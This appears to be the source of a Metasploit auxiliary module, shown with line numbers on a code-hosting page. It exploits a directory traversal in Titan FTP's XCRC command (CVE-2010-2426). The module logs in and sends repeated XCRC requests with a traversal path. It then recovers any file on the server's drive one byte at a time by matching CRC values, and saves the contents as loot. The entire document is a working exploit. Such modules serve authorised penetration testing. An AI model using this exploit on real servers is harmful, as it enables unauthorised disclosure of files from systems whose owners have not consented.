Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Ftp
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def proto
12
    'ftp'
13
  end
14

15
  def initialize
16
    super(
17
      'Name'           => 'Titan FTP XCRC Directory Traversal Information Disclosure',
18
      'Description'    => %q{
19
          This module exploits a directory traversal vulnerability in the XCRC command
20
        implemented in versions of Titan FTP up to and including 8.10.1125. By making
21
        sending multiple XCRC command, it is possible to disclose the contents of any
22
        file on the drive with a simple CRC "brute force" attack.
23

24
        Although the daemon runs with SYSTEM privileges, access is limited to files
25
        that reside on the same drive as the FTP server's root directory.
26
      },
27
      'Author'         =>
28
        [
29
          'jduck',
30
          'Brandon McCann @zeknox <bmccann[at]accuvant.com>',
31
        ],
32
      'License'        => MSF_LICENSE,
33
      'References'     =>
34
        [
35
          [ 'CVE', '2010-2426' ],
36
          [ 'OSVDB', '65533'],
37
          [ 'URL', 'https://seclists.org/bugtraq/2010/Jun/160' ]
38
        ],
39
      'DisclosureDate' => 'Jun 15 2010'
40
    )
41

42
    register_options(
43
      [
44
        Opt::RPORT(21),
45
        OptString.new('TRAVERSAL', [ true, "String to traverse to the drive's root directory", "..\\..\\" ]),
46
        OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'windows\\win.ini'])
47
      ])
48
  end
49

50

51
  def run_host(ip)
52

53
    c = connect_login
54
    return if not c
55

56
    path = datastore['TRAVERSAL'] + datastore['PATH']
57

58
    res = send_cmd( ['XCRC', path, "0", "9999999999"], true )
59
    if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./)
60
      print_error("Unable to obtain file size! File probably doesn't exist.")
61
      return
62
    end
63
    file_size = $1.to_i
64

65
    update_interval = 1.5
66
    last_update = Time.now - update_interval
67

68
    old_crc = 0
69
    file_data = ''
70
    file_size.times { |off|
71
      res = send_cmd( ['XCRC', path, "0", (off+1).to_s], true )
72
      if not (res =~ /250 (.*)\r?\n/)
73
        raise RuntimeError, "Unable to obtain XCRC of byte #{off}!"
74
      end
75

76
      crc = $1.to_i(16)
77
      if (crc == 0)
78
        raise RuntimeError, "Unable to decode CRC: #{$1}"
79
      end
80

81
      ch = char_from_crc(crc, old_crc)
82
      if not (ch)
83
        raise RuntimeError, ("Unable to find a CRC match for 0x%x" % crc)
84
      end
85

86
      # got this byte ;)
87
      file_data << ch
88
      old_crc = crc
89

90
      if (Time.now - last_update) >= update_interval
91
        progress(file_size, off)
92
        last_update = Time.now
93
      end
94
    }
95

96
    progress(file_size, file_size)
97

98
    fname = datastore['PATH'].gsub(/[\/\\]/, '_')
99
    p = store_loot("titanftp.traversal", "text/plain", ip, file_data, fname)
100
    print_good("Saved in: #{p}")
101
    vprint_status(file_data.inspect)
102

103
    disconnect
104

105
  end
106

107
  #
108
  # Return a character code from the crc, or nil on failure
109
  #
110
  def char_from_crc(crc, old_crc)
111
    256.times { |x|
112
      ch = x.chr
113
      if (Zlib.crc32(ch, old_crc) == crc)
114
        return ch
115
      end
116
    }
117
    nil
118
  end
119

120
  def progress(total, current)
121
    done = (current.to_f / total.to_f) * 100
122
    percent = "%3.2f%%" % done.to_f
123
    print_status("Obtaining file contents - %7s done (%d/%d bytes)" % [percent, current, total])
124
  end
125
end
126

127